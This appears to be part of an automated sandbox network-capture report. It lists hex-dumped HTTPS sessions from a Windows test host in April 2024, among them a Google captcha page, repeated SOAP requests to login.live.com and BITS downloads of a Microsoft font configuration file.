                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                                                2024-04-26 21:15:16 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 48 4c 56 45 4a 50 61 30 71
                                                                                                Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="HLVEJPa0q
                                                                                                2024-04-26 21:15:16 UTC1032INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                                                Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.54972240.126.28.23443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:16 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 3592
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:16 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:17 UTC569INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:16 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: de44254f-becc-4987-86a6-cc14c9a2ec9f
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F1B5 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:16 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 11393
                                                                                                2024-04-26 21:15:17 UTC11393INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.2.54972540.126.28.23443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:19 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 3592
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:19 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:19 UTC569INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:19 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: 771685e9-df93-499c-a8b2-98880e4285bb
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F91A V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:19 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 11393
                                                                                                2024-04-26 21:15:19 UTC11393INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.2.54972640.126.28.23443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:20 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4775
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:20 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:21 UTC568INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:21 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C555_SN1
                                                                                                x-ms-request-id: acbcf4be-1d0c-42cd-9e15-9167ad24e438
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F06D V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:20 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 1918
                                                                                                2024-04-26 21:15:21 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.2.54972723.46.214.6443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:20 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                Accept-Encoding: identity
                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                Host: fs.microsoft.com
                                                                                                2024-04-26 21:15:20 UTC466INHTTP/1.1 200 OK
                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                Content-Type: application/octet-stream
                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                Server: ECAcc (chd/073D)
                                                                                                X-CID: 11
                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                Cache-Control: public, max-age=35308
                                                                                                Date: Fri, 26 Apr 2024 21:15:20 GMT
                                                                                                Connection: close
                                                                                                X-CID: 2


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                13192.168.2.54972823.46.214.6443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:21 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                Accept-Encoding: identity
                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                Range: bytes=0-2147483646
                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                Host: fs.microsoft.com
                                                                                                2024-04-26 21:15:21 UTC520INHTTP/1.1 200 OK
                                                                                                Content-Type: application/octet-stream
                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                ApiVersion: Distribute 1.1
                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                X-MSEdge-Ref: Ref A: 86D4C1EC23844E65A40A9F1508D7BABF Ref B: BL2EDGE2514 Ref C: 2023-04-05T23:36:05Z
                                                                                                Cache-Control: public, max-age=35250
                                                                                                Date: Fri, 26 Apr 2024 21:15:21 GMT
                                                                                                Content-Length: 55
                                                                                                Connection: close
                                                                                                X-CID: 2
                                                                                                2024-04-26 21:15:21 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                14192.168.2.54972940.126.28.23443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:21 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4775
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:21 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:22 UTC569INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:21 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: 41f11c11-53a7-4e05-a290-f480c5b4381e
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F8FE V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:21 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 11393
                                                                                                2024-04-26 21:15:22 UTC11393INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                15192.168.2.54973040.126.28.23443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:21 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4775
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:21 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:22 UTC568INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:21 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C555_SN1
                                                                                                x-ms-request-id: 95a20bbe-a652-4a9b-9936-d7f772a345cc
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F0C5 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:21 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 1918
                                                                                                2024-04-26 21:15:22 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
